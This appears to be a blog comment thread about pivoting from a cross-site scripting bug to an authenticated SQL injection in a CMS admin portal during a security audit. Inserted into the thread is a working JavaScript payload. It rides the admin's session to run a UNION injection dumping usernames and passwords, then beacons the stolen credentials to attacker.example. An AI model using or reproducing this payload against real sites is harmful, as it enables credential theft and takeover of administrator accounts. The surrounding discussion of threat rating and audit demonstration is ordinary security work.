Blog Comments

  1. amolnaik4
    Quote Originally Posted by [s]
    Most probably threat level is low : ) Thanks Bro...
    In the same sense, all XSSes on IE would have a threat level of low. But that will not be the case. Threat severity will always depend on other points as well, such as ease of exploitation, exploit availability, knowledge required to exploit, etc.

    So you can only say it's low when you know the admin only uses a browser with anti-XSS protections (filters, add-ons, extensions, etc.). A single instance of using another browser makes it High.

    AMol NAik
  2. [s]
    Quote Originally Posted by amolnaik4
    If that's the case, then you need to find the 0-day in that or decrease the threat level.
    Most probably threat level is low : ) Thanks Bro...
  3. amolnaik4
    Quote Originally Posted by [s]
    This way is really innovative. I have some questions.
    1) How do we know the table name and column name? If it is a public CMS and vulnerable to SQLi, then it's possible to do easily.
    2) What about IE? They have anti-XSS.
    Here are the answers:
    1) At the moment of writing this post, I assumed that the SQL injection vulnerability in the CMS is already public. So you can use that to know the database details needed to fetch the data.

    The other scenario I can think of is a grey-box audit. Suppose you audited the admin portal and found that it is vulnerable to SQLi; you reported the issue and the client says it should be low/medium as only the admin has access to the vulnerable page. Again, the client has extra mitigations, such as there being only one admin, who is trusted and has IP-address-level access to the admin portal. So now in this case, if you have an XSS bug in the main site, you can demonstrate using this technique that the authenticated SQLi can still be exploited.

    2) Those are browser protections and part of browser security, eventually user security. To successfully conduct this attack, the admin should be using a browser without plugins such as anti-XSS filters, NoScript, etc. If that's the case, then you need to find the 0-day in that or decrease the threat level.

    Those are my thoughts.

    AMol NAik
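An added example (not code from the original post or its author) of the pivot amolnaik4 describes in answer 1: a script injected through the XSS bug on the main site runs in the admin's browser, fires a request at the admin portal that carries the (publicly known) SQLi payload, reads the leaked value out of the response and beacons it to the attacker. Because the request is issued by the admin's own browser it carries the admin session cookie and originates from the admin's IP, so the "only one trusted admin, IP-restricted" mitigation does not help. Everything concrete here is an assumption: the endpoint `/admin/edit_article.php`, the injectable `id` parameter, the `<h1 class="title">` echo, the `cms_users` table with `username`/`password` columns, the column count of 3, and the attacker host. It also assumes the admin portal is on the same origin as the XSS'd site so the response body is readable; a cross-origin portal without CORS would need a blind (time-based or out-of-band) variant instead.

```javascript
// Added example: XSS-to-authenticated-SQLi pivot. Not from the original post.
// Endpoint, parameter, markup, table/column names and attacker host are all
// hypothetical; the CMS schema is assumed to be public, as the thread says.

// Assumed admin page whose numeric "id" parameter is injected unquoted into
// "WHERE id = $id" and which echoes the row's title in <h1 class="title">.
const ADMIN_ENDPOINT = '/admin/edit_article.php';
const INJECT_PARAM = 'id';

// UNION-based payload: id=0 returns no real row, so the first row of the
// result is the injected one. Column count (3) is assumed known in advance.
const SQLI_PAYLOAD =
  "0 UNION SELECT 1, CONCAT(username, ':', password), 3 FROM cms_users LIMIT 1 -- ";

// Build the attack URL; URLSearchParams form-encodes quotes, spaces, etc.
function buildInjectedUrl(origin, endpoint, param, payload) {
  const u = new URL(endpoint, origin);
  u.searchParams.set(param, payload);
  return u.toString();
}

// Pull the value the UNION row placed in the title element; null if absent.
const TITLE_RE = /<h1 class="title">([^<]*)<\/h1>/;
function extractLeakedValue(html) {
  const m = TITLE_RE.exec(html);
  return m ? m[1] : null;
}

// Core of the payload. fetchImpl and exfil are injected so the same logic
// runs in the admin's browser and, with fakes, under Node for testing.
async function runPivot({ origin, fetchImpl, exfil }) {
  const url = buildInjectedUrl(origin, ADMIN_ENDPOINT, INJECT_PARAM, SQLI_PAYLOAD);
  // credentials:'include' sends the admin's session cookie. The request also
  // leaves from the admin's own IP, so an allow-list on /admin/ is bypassed.
  const res = await fetchImpl(url, { credentials: 'include' });
  const leaked = extractLeakedValue(await res.text());
  if (leaked !== null) await exfil(leaked);
  return leaked;
}

// How the payload is wired up when it actually lands in the admin's browser
// (guarded so this file also loads under Node). The image beacon needs no
// CORS because nothing is read back from the attacker host.
if (typeof window !== 'undefined' && typeof fetch === 'function') {
  runPivot({
    origin: window.location.origin,
    fetchImpl: fetch,
    exfil: (v) => {
      new Image().src = 'https://attacker.example/c?d=' + encodeURIComponent(v);
    },
  });
}
```

The split into `buildInjectedUrl` / `extractLeakedValue` / `runPivot` is deliberate: during an audit you can prove each step separately (the URL really carries the payload, the response really echoes the UNION row) before asking the client to let a single admin load the XSS'd page.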
  4. [s]
    This way is really innovative. I have some questions.
    1) How do we know the table name and column name? If it is a public CMS and vulnerable to SQLi, then it's possible to do easily.
    2) What about IE? They have anti-XSS.